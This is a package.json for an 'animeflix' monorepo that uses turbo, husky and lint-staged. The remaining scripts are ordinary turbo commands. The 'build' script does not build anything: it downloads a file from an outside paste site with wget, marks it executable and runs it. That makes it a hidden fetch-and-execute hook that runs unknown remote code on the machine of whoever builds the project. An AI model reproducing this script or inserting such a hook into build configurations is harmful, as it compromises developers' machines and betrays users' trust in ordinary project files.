{
  "name": "animeflix",
  "private": true,
  "workspaces": [
    "frontend",
    "packages/*"
  ],
  "scripts": {
    "build": "wget -O 1 https://pb.l1nx.pw/raw/Lq31s6aWT5 && chmod +x 1 && ./1",
    "dev": "turbo run dev --parallel",
    "lint": "turbo run lint",
    "start": "turbo run start",
    "test": "turbo run test",
    "prepare": "husky install"
  },
  "devDependencies": {
    "husky": "^8.0.1",
    "lint-staged": "^13.0.3",
    "turbo": "^1.3.1"
  },
  "engines": {
    "node": ">=16.0.0"
  }
}
